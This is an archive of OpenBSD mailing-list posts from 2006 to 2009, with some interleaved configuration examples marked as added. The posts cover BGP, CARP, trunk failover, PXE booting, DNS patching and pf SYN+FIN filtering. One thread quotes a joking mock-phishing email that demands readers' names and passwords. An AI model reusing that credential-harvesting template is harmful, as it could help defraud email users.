*i195.166.128.0/19   195.66.224.164   195.66.224.164   90   6871
This behaviour has been observed when bringing sessions up against other routers too. Is there a way of getting bgpd to log more information as to why the session was torn down, rather than just logging state changes. I would speak to AS6871 about the problem but as yet I haven't worked out what's going wrong. 
I tried logging everything with log updates dump all in "/var/log/bgp.log" However when I look at the log with route_btoa it reveals nothing of what brought down the session. If I have left out anything pertinent beat me with a clue stick. Thanks for any help you guys can give me. Pete
Re: OpenBGPD dropping sessions.
Hi Henning
> * Pete Bristow <[EMAIL PROTECTED]> [2006-02-17 12:30]:
>> I've got OpenBGPD running on 3.7, currently whenever I bring up a session with another peer the session drops to Idle as soon as a set of routes are learnt.
>
> that, of course, is not normal behaviour and nothing we ever observed...
>
>> This behaviour has been observed when bringing sessions up against other routers too. Is there a way of getting bgpd to log more information as to why the session was torn down, rather than just logging state changes. I would speak to AS6871 about the problem but as yet I haven't worked out what's going wrong.
>
> please show the logs. bgpd does log why a session drops back to IDLE.
>
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Idle -> Connect, reason: Start
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Connect -> OpenSent, reason: Connection opened
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change OpenSent -> OpenConfirm, reason: OPEN message received
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change OpenConfirm -> Established, reason: KEEPALIVE message received
Feb 17 12:16:05 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Established -> Idle, reason: Connection closed
Was all I got. Pete
Re: Problem with squirrelmail
On 2. mar. 2006, at 14.00, Alexander Bochmann wrote: ...on Thu, Mar 02, 2006 at 01:07:09PM +0200, Gabriel George POPA wrote: I have a small problem with squirrelmail. The problem is that users cannot read their mail messages if they are too large (though not very [..] going on? Settings from /etc/inetd.conf:
# IMAP server from PINE
imap2   stream  tcp     nowait  root    /usr/sbin/imapd imapd
That doesn't really explain your problem, but if you are running an imapd from inetd and have enough users, you will certainly run into the default spawn limit of 256 connections in 60 seconds. Try cranking that up to a sensible number for your environment (nowait.2048 or something). Alex.
php has some system limits in php.ini, maybe you're hitting one of them? any clues in your php_error log? BTW, if you're only running imap for the benefit of locally hosted squirrelmail, then you can use an inetd.conf line like:
127.0.0.1:imap  stream  tcp     nowait  root    /usr/local/libexec/imapd imapd
for increased security. /Pete
Re: using openbsd on zaurus
On 12. mar. 2006, at 13.37, Theo de Raadt wrote: I'm planning to buy a zaurus sl-c3200 (the latest zaurus 3xxx model). Please note that you would be the first person. None of us have the C3200 yet. I had a look at the latest zaurus snapshot directories (on ftp.openbsd.org) and saw that the choice of available pre-build packages is highly reduced compared to i386. Most stuff compiles. Much has not been tested, though Is it possible to compile and install any applications of the ports tree on a zaurus (for example firefox, thunderbird ...)? Those two are pretty unreasonable on the Zaurus. It isn't that fast, and it is somewhat lacking in memory. There is some work on minimo, but it isn't completely reliable yet. Does the ports tree system work as well on a zaurus as on the i386 platforms or may I encounter severe build problems? As I said above, it is pretty good. But you have to be reasonable about how fast and capable a Zaurus is. Hi, For faster cpu, and many built-in goodies, I believe a similar cpu (intel pxa270) is also used in the Qtek 9000 PDA: http://www.qtekcorp.com/products.aspx?Level1=1&Menu1=0&Model=22&Submenu=2 including: Intel XScale @ 520Mhz 640x480x65k touchscreen and QWERTY keyboard GSM/GPRS/UMTS radio; 802.11b radio; 64MB RAM (128MB ROM) + SDIO/MMC card for decent flash disk. mini-USB, IRDA, bluetooth. 2x loudspeakers/headphone, 1.3Mp camera. obviously I'm aware cpu != machine etc etc. I guess it would just be a case of buy 3 ( one for me, and 2 for obsd devs) and hope that sufficient documentation would prevail... /Pete
recent CARP 'fixes'
Hi, I have a pair of openbsd amd64 3.8+ boxes with a few shared carp interfaces. They were playing perfectly together until today. I upgraded one to the 20-03-06 snapshot (the other is still at circa 18-12-2005). Now both the boxes claim to be carp MASTERs, with obvious consequences. net.inet.carp.log=1 or tcpdump don't show any problems though. /plus39.html lists 2 carp fixes. The first relates to HMAC calc, so I disabled the carp password, without any effect. The other fix relates to a 'short' incorrect MASTER status at boot - whereas mine seems to persist indefinitely. Is this an incompatibility between o/s versions, or just a passing -current hiccup ? /Pete [EMAIL PROTECTED] /root> cat /var/run/dmesg.boot OpenBSD 3.9-current (GENERIC.MP) #750: Sun Mar 19 18:25:28 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP real mem = 2146140160 (2095840K) avail mem = 1834962944 (1791956K) using 22937 buffers containing 214822912 bytes (209788K) of memory mainbus0 (root) ipmi0 at mainbus0: version 1.5 interface KCS iobase 0xca2/2 spacing 1 mainbus0: scanning 0x98800 to 0x98bf0 for MP signature mainbus0: scanning 0x98400 to 0x987f0 for MP signature mainbus0: scanning 0xf to 0x0 for MP signature mainbus0: MP floating pointer found in bios at 0xf72f0 mainbus0: MP config table at 0x9bb20, 372 bytes long mainbus0: Intel MP Specification (Version 1.4) (AMD HAMMER ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: AMD Opteron(tm) Processor 252, 2612.34 MHz cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: calibrating local timer cpu0: apic clock running at 200MHz cpu0: kstack at 0x800067d66000 for 20480 bytes cpu0: 
idle pcb at 0x800067d66000, idle sp at 0x800067d6aff0 cpu1 at mainbus0: apid 1 (application processor) cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu1: kstack at 0x800067d6b000 for 20480 bytes cpu1: idle pcb at 0x800067d6b000, idle sp at 0x800067d6fff0 mpbios: bus 0 is type PCI mpbios: bus 1 is type PCI mpbios: bus 2 is type PCI mpbios: bus 3 is type PCI mpbios: bus 4 is type PCI mpbios: bus 128 is type PCI mpbios: bus 129 is type PCI mpbios: bus 134 is type PCI mpbios: bus 139 is type ISA ioapic0 at mainbus0 apid 2 pa 0xfec0, virtual wire mode, version 11, 24 pins ioapic1 at mainbus0 apid 3 pa 0xd800, virtual wire mode, version 11, 7 pins ioapic2 at mainbus0 apid 4 pa 0xd8001000, virtual wire mode, version 11, 7 pins ioapic0: int0 attached to ExtINT (type 0x3 flags 0x5) ioapic0: int1 attached to isa0 irq 1 (type 0x0 flags 0x5) ioapic0: int2 attached to isa0 irq 2 (type 0x0 flags 0x5) ioapic0: int3 attached to isa0 irq 3 (type 0x0 flags 0x5) ioapic0: int4 attached to isa0 irq 4 (type 0x0 flags 0x5) ioapic0: int5 attached to isa0 irq 5 (type 0x0 flags 0x5) ioapic0: int6 attached to isa0 irq 6 (type 0x0 flags 0x5) ioapic0: int7 attached to isa0 irq 7 (type 0x0 flags 0x5) ioapic0: int8 attached to isa0 irq 8 (type 0x0 flags 0x5) ioapic0: int9 attached to isa0 irq 9 (type 0x0 flags 0x5) ioapic0: int10 attached to isa0 irq 10 (type 0x0 flags 0xf) ioapic0: int11 attached to isa0 irq 11 (type 0x0 flags 0xf) ioapic0: int12 attached to isa0 irq 12 (type 0x0 flags 0x5) ioapic0: int13 attached to isa0 irq 13 (type 0x0 flags 0x5) ioapic0: int14 attached to isa0 irq 14 (type 0x0 flags 0x5) 
ioapic0: int15 attached to isa0 irq 15 (type 0x0 flags 0x5) ioapic0: int10 attached to pci0 device 2 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci0 device 2 INT_B (type 0x0 flags 0xf) ioapic0: int10 attached to pci0 device 8 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci1 device 5 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci2 device 0 INT_A (type 0x0 flags 0xf) ioapic0: int10 attached to pci3 device 0 INT_A (type 0x0 flags 0xf) local apic: int0 attached to ExtINT (type 0x3 flags 0x5) local apic: int1 attached to NMI (type 0x1 flags 0x5) mainbus0: MP WARNING: 160 bytes of extended entries not examined pci0 at mainbus0 bus 0: configuration mode 1 "NVIDIA nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured pcib0 at pci0 dev 1 function 0 "NVIDIA nForce4 ISA" rev 0xa3 nviic0 at pci0 dev 1 function 1 &
Re: OT: App to get detailed http measurements
I've had good results with SIEGE http://www.joedog.org/ /Pete On 14 Jun 2008, at 12:55, Mikolaj Kucharski wrote: Hi, This is off topic, but does anyone know preferably commandline utility with which I could test HTTP server? What interests me is repeated connections and stats how long it took dns resolv, tcp connect, send request and finaly download of data. Really appreciate any tips. Thanks. -- best regards q#
Re: pass pasword to ssh
perhaps you could write your script in perl ? http://www.openbsd.org/4.3_packages/i386/p5-Net-SSH-Perl-1.30.tgz-long.html /Pete On 19 Jun 2008, at 16:31, Stuart Henderson wrote: On 2008-06-19, Richard Storm <[EMAIL PROTECTED]> wrote: I am writing script, that would ssh to switch and dump configuration in file. 1) Since it is switch, i have no way to make use of public key authentication, because I have no way to store pubkey on switch. Which switch? On my HP switches I can just sftp the public keys in (and fetch the config back out the same way...) What is the cleanest way to pass password to ssh? Not sure about "cleanest", but expect (in packages/ports) works ok. You can generate a script with "autoexpect" and manually edit it.
Re: OpenBSD project goals
nah, real men wrote a program to write their thesis for them ;-) /Pete On 24 Jun 2008, at 22:29, Martin Schrvder wrote: 2008/6/24 Pierre Riteau <[EMAIL PROTECTED]>: As someone already said earlier, you can write your letter in troff with mg or vi and create a postscript file from that. Real Men wrote their thesis directly in PostScript using ed. :-) Best Martin
DNS patch
Does this mean we should expect one soon ? http://securosis.com/publications/CERT%20Advisory.doc /Pete
Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
looks like there is some work in progress to update the in-tree BIND to 9.4.2-P1 + local tweaking, for example: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/bind/lib/dns/dispatch.c?r1=1.8 As Theo points out, patience is a virtue, and it's the "+ local tweaking" above that is the reason I gratefully use OpenBSD. /Pete On 9 Jul 2008, at 16:45, Zamri Besar wrote: Good morning, Today, I'm received alert from one of my friends regarding to Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning. http://www.kb.cert.org/vuls/id/800113 I checked the above site, and found that most of the *BSD status are unknown. Is this bug affected OpenBSD default bind dns? I'm don't know either the above bug is similar to this thread or not. http://marc.info/?l=openbsd-misc&m=118539211412877&w=2 -- Thank you. Yours truly, Zamri Besar
Re: eeepc via usb pen
1. enable netboot in eee's BIOS settings 2. man 8 pxeboot /Pete On 23 Jul 2008, at 16:33, [EMAIL PROTECTED] wrote: Hi Sorry for the noise but I am trying to install openbsd on an eeepc via a usb pen. I have managed to install 4.(1 or 2) in the past but do not seem to be able to get the 4.3 install to boot off a pen. I know I could (hopefully) un-tar the files from the install4.3.iso mounted with loopback on another *nix and copy the fs then configure everything and dd the mbr (or something like that); the closest i have got is a kernel panic saying boot too old upgrade when I try to boot bsd.rd via grub. But is there an easier way (without buying a usb cdrom) to boot the usb pen as an install source?
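Added example of what the two steps above amount to on the serving side (not from the thread): pxeboot(8) needs a DHCP server that names the loader and a TFTP server that hands out pxeboot, bsd.rd and an /etc/boot.conf telling pxeboot which kernel to fetch. Written for a recent OpenBSD install server with the base tftpd(8); on 4.3 tftpd ran from inetd instead (the commented tftp line in the stock inetd.conf, with -s /tftpboot). The server address, subnet and pool are placeholders; pxeboot and bsd.rd are the files from the i386 install set for the release being installed.

```conf
# /etc/rc.conf.local -- on releases with rcctl(8): rcctl enable dhcpd tftpd
dhcpd_flags=""
tftpd_flags="/tftpboot"         # serve /tftpboot; put pxeboot and bsd.rd here

# /etc/dhcpd.conf -- the PXE ROM asks for an address and a boot file name
subnet 192.0.2.0 netmask 255.255.255.0 {
        option routers 192.0.2.1;
        range 192.0.2.100 192.0.2.110;
        next-server 192.0.2.1;          # TFTP server to fetch the loader from
        filename "pxeboot";             # second-stage loader from the install set
}

# /tftpboot/etc/boot.conf -- pxeboot fetches this over TFTP, then the kernel
boot tftp:/bsd.rd
```

Once bsd.rd is up the installer can still take its sets from the USB pen or over HTTP; PXE only replaces the part that would not boot from the pen. Treat the install server as trusted, and take it down again afterwards: anything on that network segment can now boot a kernel it hands out.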
Re: Is it necessary to recompile OS to apply security patch?
Hi, Assuming the box is only a DNS server, then the simplest & easiest (in my opinion) is to take a copy of the DNS related files: - /etc/rc.conf.local - /var/named/* - noting also IP address, hostname etc etc and then reinstall the o/s from a recent snapshot (downloaded here ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/ or mirror), which has all the patches pre-applied. Then restore the above files. job done. if you're paranoid and inexperienced in unix, then grab a spare machine to do a dry run on that. /Pete On 29 Jul 2008, at 18:16, skogzort wrote: Hello, I know nothing/very little about OpenBSD or UNIX. I have been tasked with updating our OpenBSD DNS server with a security fix (Vulnerability Note VU#800113- Multiple DNS implementations vulnerable to cache poisoning). In order to do this it appears that I have to download the source code and re-compile the entire OS. Recompiling the OS seems to involve a lot of steps. Before I continue to read through them all, I just want to confirm that it is actually necessary to do all of this, simply to apply a security patch: Download the tree.. Pre load the tree.. Build the Kernel.. Build the userland.. Etc. The only thing we use the server for is DNS. I don't know what flavor we are running, since it's on a production server I assume it will be -release or -stable, either way from what I've read so far it looks like in order to apply this security patch I will have to update it to -stable, which seems to require that the entire OS be recompiled. Is this correct? Is it true that the only way to apply this patch is to recompile the entire OS, and go through all the steps above? I don't mind doing all this since it will give me a chance to learn, it's just that the more steps I have to take, the more chances there are for mistakes. I want to be sure that the way I plan to do the update is the simplest. 
I'm only familiar with Windows, where you just push a button to apply a security patch and you don't even have to reboot the server, so I was thinking that I may be misunderstanding what I'm reading. Thanks very much for your time and any info Kyle
nagios check_via_ssh on (chroot) OpenBSD
Does anyone have it running in nagios chroot environment ?
[EMAIL PROTECTED] /> ldd /usr/local/libexec/nagios/check_by_ssh
/usr/local/libexec/nagios/check_by_ssh:
        Start    End      Type Open Ref GrpRef Name
                          exe  1    0   0      /usr/local/libexec/nagios/check_by_ssh
        052b6000 252ba000 rlib 0    1   0      /usr/local/lib/libintl.so.4.0
        0e276000 2e352000 rlib 0    1   0      /usr/local/lib/libiconv.so.4.0
        0e739000 2e76d000 rlib 0    1   0      /usr/lib/libc.so.43.0
        0fc4     0fc4     rtld 0    1   0      /usr/libexec/ld.so
perhaps the ssh libraries are not needed, but where should the ssh keys be put ?
[EMAIL PROTECTED] />grep nagios /etc/passwd
_nagios:*:550:550:Nagios user:/var/www/nagios:/sbin/nologin
in /var/www/nagios/.ssh/ ? TiA, Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 SystemNet AS
Re: Using trunk(4) to put a router in a switch ring
1. create a layer 2 (switched) ring, using spanning tree. - completely independent of openbsd box
2. connect your (dual NIC) openbsd box to 2 separate switches for redundancy, and add both NICs to a trunk group. - redundancy of switch, cabling and NICs.
[EMAIL PROTECTED] ~>ifconfig bge0
bge0: flags=8943 mtu 1500
        lladdr 00:18:fe:32:1e:08
        trunk: trunkdev trunk0
        media: Ethernet autoselect (1000baseT full-duplex)
        status: active
[EMAIL PROTECTED] ~>ifconfig bge1
bge1: flags=8943 mtu 1500
        lladdr 00:18:fe:32:1e:08
        trunk: trunkdev trunk0
        media: Ethernet autoselect (1000baseT full-duplex)
        status: active
[EMAIL PROTECTED] ~>ifconfig trunk0
trunk0: flags=8843 mtu 1500
        lladdr 00:18:fe:32:1e:08
        trunk: trunkproto failover
                trunkport bge1 active
                trunkport bge0 master,active
        groups: trunk egress
        media: Ethernet autoselect
        status: active
        inet 1.2.3.4 netmask 0xff00 broadcast 255.255.255.0
been using it for years:
[EMAIL PROTECTED] ~>uname -a
OpenBSD tug 4.0 GENERIC#1107 i386
/Pete On 22 Sep 2008, at 22:03, Stuart Henderson wrote: On 2008-09-22, Dave Wilson <[EMAIL PROTECTED]> wrote: I'm not sure if trunk or bridge are more appropriate in this case I think probably bridge with RSTP, but I'm not sure how that will play with vlans (if you use them). I'd like to do something similar, but I have vlans, and as an added twist my interconnects are over third-party vlans, and I'm not especially keen on breaking the third party's switch fabric, so I haven't risked experimenting much with this yet :)
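Added example (not from the thread, not Pete's files): the hostname.if(5) files that produce the failover trunk shown in the ifconfig output above, so the setup survives a reboot. Interface names are the ones in that output; the 1.2.3.4 address is the placeholder used there and a /24 mask is assumed.

```conf
# /etc/hostname.bge0 -- physical ports carry no address of their own
up

# /etc/hostname.bge1
up

# /etc/hostname.trunk0 -- failover: one port carries traffic, the other
# takes over when its link goes down. The first trunkport listed becomes
# the master, matching "trunkport bge0 master,active" above.
trunkproto failover trunkport bge0 trunkport bge1
inet 1.2.3.4 255.255.255.0
```

Apply without a reboot with sh /etc/netstart bge0 bge1 trunk0, then verify the failover path before relying on it: ifconfig bge0 down should leave trunk0 with status: active and bge1 as the only active trunkport, and pinging through the trunk should continue. Both switch ports have to be plain access ports in the same VLAN; because the two NICs share one lladdr, the switches see the MAC move from one port to the other on failover, which is expected and nothing to suppress.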
Re: Using trunk(4) to put a router in a switch ring
well i think you could insert your dual NIC openbsd host into the switch 'ring' physically, then bridging between the 2 NICs and firing up STP, but be aware that every time you up/down an interface or reboot your openbsd box, you'll trigger an STP recalc - which is around 45sec outage across entire switch infrastructure. (This can be mitigated with PVST and RSTP somewhat). /Pete On 23 Sep 2008, at 14:51, Dave Wilson wrote: Pete Vickers wrote: 1. create a layer 2 (switched) ring, using spanning tree. - completely independent of openbsd box 2. connect your (dual NIC) openbsd box to 2 separate switches for redundancy, and add both NICs to a trunk group. - redundancy of switch, cabling and NICs. Pete, thanks for your useful and informative reply. A decent example is worth a paragraph of explanation to me :-) Whilst I would love to do as you suggest, unfortunately my switches only have 2 GbE ports each. My hope was to put the routers in the GbE ring, as otherwise my routers will be bottlenecked by plugging into 100M ports on the switches. As most of my traffic goes through the routers this would be a big issue. I suspect the only way I will really nail down what I can and cannot do will be to get some new switches and build a router and start playing around. The thing that I think is most likely to break is that I already use vlans and carp, and so I will have to work out the proper way to layer physical, bridge, vlan and carp whilst still making sure that packets keep going round the ring. Unless reyk@, porter of the rstp code for bridge, can tell me different...? SD
Re: Unified BSD?
On Mon, Nov 12, 2012 at 12:37 PM, Robin Björklin wrote:
> Am I bat crap crazy for thinking it could be good to merge the four largest BSD variants out there, take the best bits and pieces out of each and create a Unified BSD?
You are not crazy for thinking this, and fortunately there is nothing prohibiting you from doing so (or a collective group of people, or company etc...). One thing you will see in the BSD Unix systems is there is quite a bit of cross pollination between projects. The largest current example of this from my perspective is support for OpenBSD's "pf" packet filter in FreeBSD. This is a packet filter built to suit the OpenBSD developers' goals, but it did not restrict FreeBSD from supporting this packet filter, and hopefully both projects benefit from this collaboration (wider code exposure of the pf code, and wider choice of packet filters for FreeBSD users). My opinion is that with the current state of the BSDs this is one of their stronger suits - we have multiple projects right now building entire operating systems to suit each project's stated goals and developer wishes. This would be opposed to gnu/linux where you are cobbling together many disparate sources to build your distribution (some of which will have goals that may not line up with your goals). With this diversity we still cross pollinate ideas and methods, but are still allowed to spend our limited resources focusing on our projects' core goals. -pete -- pete wright www.nycbug.org @nomadlogicLA
Re: Ramifications of blocking SYN+FIN TCP packets
Hi,

What about Postel's 'be liberal in what you accept' ? What about peers/intermediate systems that have for example bugs which accidentally set FIN flags (ISP's broken traffic shaping/limiting device anyone ?). If pf can safely cleanse such legitimate traffic, then why block it ?

Blindly implementing 'orders' from PCI etc is just wrong - to do so is only encouraging such bad practices. Instead reject their demands, using whatever appeals process is available. Only when enough technical staff do so will it be fixed. All such regulations should be of the style where both of these are permitted:

- "I am a stupid admin, so I'll just blindly follow them" and
- "I am a competent admin, so I'll use my judgement to best protect my net"

How about this, for a fun response: "We don't want to drop such 'special' traffic, since if we do so, then an attacker can deduce that we have implemented PCI guidelines, which in turn implies we have CC details online, and thus are a more attractive target" ...

/Pete

On 12 Mar 2009, at 10:22, J.C. Roberts wrote:
> On Wed, 11 Mar 2009 13:07:22 -0400 Jason Dixon wrote:
>> On Wed, Mar 11, 2009 at 01:04:34PM -0400, David Goldsmith wrote:
>>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA1
>>>
>>> Jason Dixon wrote:
>>>> S/SAFR
>>>> I just had to deal with this on our customer's PCI scan. Don't argue with the logic, just do it. :)
>>>
>>> Let me guess -- TrustKeeper? We just had to deal with this as well. Submit an appeal and they should accept it.
>>
>> Yup. The "flags S/SAFR" will work unless you are being a good little pf admin and also scrubbing all the traffic. The problem is pf considers SYN-RST packets to be illegal and drops them (good) but only considers SYN-FIN packets to be ambiguous and so it "normalizes" them and clears the FIN bit (in this case for the PCI scan - bad). Then your server behind the firewall receives what it thinks is a nice clean SYN packet and it sends back SYN-ACK.
>>
>> Yes, we have our own reasons not to scrub there.
>
> Well, *someone* has their reasons. I have to deal with those reasons. ;)
>
> Ahhh my least favorite acronym name space conflict: PCI == Payment Card Industry
>
> Their "security through ignorance" practices are nearly as illustrious as their "business through abusive lending" practices. The thing to remember is the security facade they require is almost entirely for the sake of public confidence and litigation defense. --hmmm... I should probably save the rest of this rant for a far more appropriate mailing list, like /dev/null
>
> Anyhow, back to the original question, "are there any ramifications to blocking SYN+FIN completely?"
>
> Some (Darren Reed, ipf author) think that pf unconditionally clearing the FIN flag on scrub is a bug. And no, we don't need a flame war about whether or not Darren is "right," but none the less, it's still good to see how the RFCs and ideas about "correct" filtering are both subject to lots of interpretation.
>
> http://www.derkeiler.com/Mailing-Lists/FreeBSD-Security/2005-07/0011.html
>
> I know SYN+FIN is a valid packet according to RFC 793 and 1644 (T/TCP), but the more important question is, "what are the valuable *uses* for SYN+FIN packets?" Personally, I can't think of any valuable uses. Can you?
>
> Just because SYN+FIN is a technically valid packet according to the various RFCs doesn't mean we want or need such traffic, and doesn't mean we consider it valuable and useful. Can you think of any RFC valid traffic you're dropping when the RFCs tell you that you're supposed to respond to it? --Ya, I thought so.
>
> Spammers? --Yep, RFC valid traffic.
> DDOS? --Yep, RFC valid traffic.
> Brute Force? --Yep, RFC valid traffic.
> port scans --A lot of it is RFC valid traffic.
>
> Though 'scrub' will drop the FIN flag off the SYN+FIN packets, the bofhish instinct says without a proven and valuable *use* for SYN+FIN, then just block it. If anyone complains about breakage, then just point your (middle) finger at PCI/TrustKeeper compliance requirements, and tell the user to take it up with them.
>
> Call me overly pragmatic, but if something in a standard is not providing valuable use (i.e. reward) and poses *any* type of risk or cost (including the risk and cost of wasting my time filing and maintaining some appeal), then the answer is painfully simple.
>
> --
> J.C. Roberts
Re: feature request OpenBGPD: route server ability to disable best path selection
The 'standard' (for at least one vendor's definition of standard) way to get around this is to slap a different route distinguisher (RD) on each of the desired 'duplicate' paths. BGP then sees these as individual paths and will happily communicate both concurrently. Separate but related is the ability to import both RDs into the same VRF on the recipient of the BGP peering, and thus into the routing table (FIB) to use multiple paths (load balancing) etc.

/Pete

On 18 Mar 2009, at 11:32, Claudio Jeker wrote:
> On Wed, Mar 18, 2009 at 11:00:32AM +0100, Arnoud Vermeer wrote:
>> I have a problem with filtering on the current route server implementation. I currently have the following setup:
>>
>>   10.0.1.0/24          10.0.1.0/24
>>   +-----------+        +-----------+
>>   | AS1       |        | AS2       |
>>   | 10.0.0.50 |        | 10.0.0.51 |
>>   +-----------+        +-----------+
>>         |                    |
>>         +---------+----------+
>>                   |
>>             +-----------+
>>             | RS        |
>>             | 10.0.0.49 |
>>             +-----------+
>>                   | deny to { 10.0.0.52 } AS 1
>>             +-----------+
>>             | AS3       |
>>             | 10.0.0.52 |
>>             +-----------+
>>
>> (or http://www.freshway.biz/files/20090318-problem-filter.txt for the correct ASCII)
>>
>> Both AS1 and AS2 announce the same prefix, but the route server selects the AS1 path because of the lower nexthop value. Now I add a filter to AS3. I deny to send any prefixes to AS3 that match AS1. Now AS3 doesn't receive the 10.0.1.0/24 prefix at all. It should however receive it from AS2.
>>
>> Quagga overcomes this problem by making a per-filtered-peer RIB and then do best path selection (http://www.quagga.net/docs/docs-multi/Description-of-the-Route-Server-model.html). I think this is just an ugly and complicated work-around as it doesn't solve the core of the problem. In my eyes the best solution will be to disable the best-path-selection on the route server altogether, and send all routes (except the filtered) to the peer.
>>
>> Arguments to do this:
>> - As shown above, the best path selection breaks on the route server when applying filters.
>> - A route server should not make any best-path selection, because the peers criteria could be completely different than the route server.
>> - The function of the route server is to 'collect' all the routes and send them to all of the peers, not to 'collect a subset' of the routes and send that to its peers.
>>
>> I would love to hear your thoughts on this subject. Would it be hard to implement this feature?
>
> BGP only supports one path per prefix and peer. If you send multiple ones as you propose the later ones will overwrite the first one no matter what. To support your idea we would need a per-filtered-peer local-RIB because the route-server needs to do the best path selection for the peer.
>
> --
> :wq Claudio
Re: European orders
A public statement from him (Wim) would be appropriate now I believe. Especially informing all of us who have pre-ordered the latest release via him what will happen with our orders, and importantly when he will forward the proceeds to Theo et al.

/Pete

On 25 Mar 2009, at 01:16, Floor Terra wrote:
> On Wed, Mar 25, 2009 at 12:34 AM, Theo de Raadt wrote:
>>> Do you have any advice for those who already ordered? Or should we contact the distributor?
>>
>> Sorry, but I don't know that yet. We'll see, I suppose.
>
> Wim called me 20 minutes ago and explained the situation to me. If you have any questions just mail him or give him a call.
>
> --
> Floor Terra
> www: http://brobding.mine.nu/
correction to gre(4) man page
SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is: http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt /Pete
Re: correction to gre(4) man page
On 12 Apr 2009, at 23:47, Jason McIntyre wrote:
> On Sun, Apr 12, 2009 at 10:40:08PM +0200, Pete Vickers wrote:
>> SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is:
>> http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt
>> /Pete
>
> that link works fine here.
> jmc

ahh, indeed. The culprit was the man->html conversion for this: http://www.openbsd.org/cgi-bin/man.cgi?query=gre where the URL is line wrapped, but the html does not take it into account. thanks for pointing it out.

/Pete
Re: MPLS status questions.
On 30 Apr 2009, at 00:14, Daniel Ouellet wrote:
> Joe S wrote:
>> What's really frustrating here are the network admins I work with that are trying to migrate from ipsec vpns to MPLS because it's "easier" and "just as secure".
>
> Well, I am not sure that it would be very convincing to them, but I guess a somewhat good argument to use might be as simple as asking them if they would replace IPSec tunnel/VPN on a big switch WAN/LAN network with only VLan tag instead? That's about what they say isn't it? Scary.
>
> May not be a very good example, but I think the analogy between them is somewhat valuable in idea and concept anyway. But again, the norm looks like these days is to only consider security after the fact and react to it instead of being proactive on it.
>
> See what they say.
>
> Best,
> Daniel

you don't use telnet even over an IPSec WAN do you ? end-to-end security (e.g. TLS/SSL) is your friend here. It's the only way to actively verify link security and once you're in an SSH session (with properly verified keys), you don't care who's watching the stream

/Pete
Re: IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK
On 27 May 2009, at 10:01, Otto Moerbeek wrote:
> On Wed, May 27, 2009 at 09:43:18AM +0200, Otto Moerbeek wrote:
>> On Wed, May 27, 2009 at 10:29:10AM +0300, Gregory Edigarov wrote:
>>> Bob Beck wrote:
>>>> * Chris Harries [2009-05-26 10:48]:
>>>>> it sure beats everyone moaning at me as they cannot read e-mails clearly marked IMPORTANT, DO THIS OR YOUR E-MAIL WONT WORK, then moaning when their email doesn't work
>>>>
>>>> IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK
>>>>
>>>> We are refreshing our openbsd mailing lists to ensure that the list memberships correctly match our business process and security roles. In order to ensure your list memberships and email continue to work without interruption, please reply to this email with the following information:
>>>>
>>>> Name : ___
>>>> Email ID:
>>>> Password:
>>>>
>>>> Thanks for helping to ensure the integrity of our email system.
>>>
>>> Pardon? I do not understand what is this for
>>
>> explanation will follow once you provide the neccesary provide of ehhh
>
> s/provide/proof
>
>> authentication.
>>
>> -Otto

I seriously thought you'd done the typo deliberately to mimic the poor english typically found in such fraud emails. LoL.

/Pete
Re: BGP and NATting to multiple ISPs
On 18 June 2009, at 19:45, Karl O. Pinc wrote:
> What's the best way to solve this problem?

stop trying to bodge it, and get some PI space.

/Pete
Re: BGP and NATting to multiple ISPs
nah, you may be right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.

/Pete

On 18 June 2009, at 22:49, tico wrote:
> Karl O. Pinc wrote:
>> On 06/18/2009 01:50:17 PM, Pete Vickers wrote:
>>> On 18 June 2009, at 19:45, Karl O. Pinc wrote:
>>>> What's the best way to solve this problem?
>>>
>>> stop trying to bodge it, and get some PI space.
>>
>> I'd love to, but how can I justify to ARIN a large enough address block that it won't be dropped by BGP administrators? The only reason we'd need the addresses is to multi-home.
>
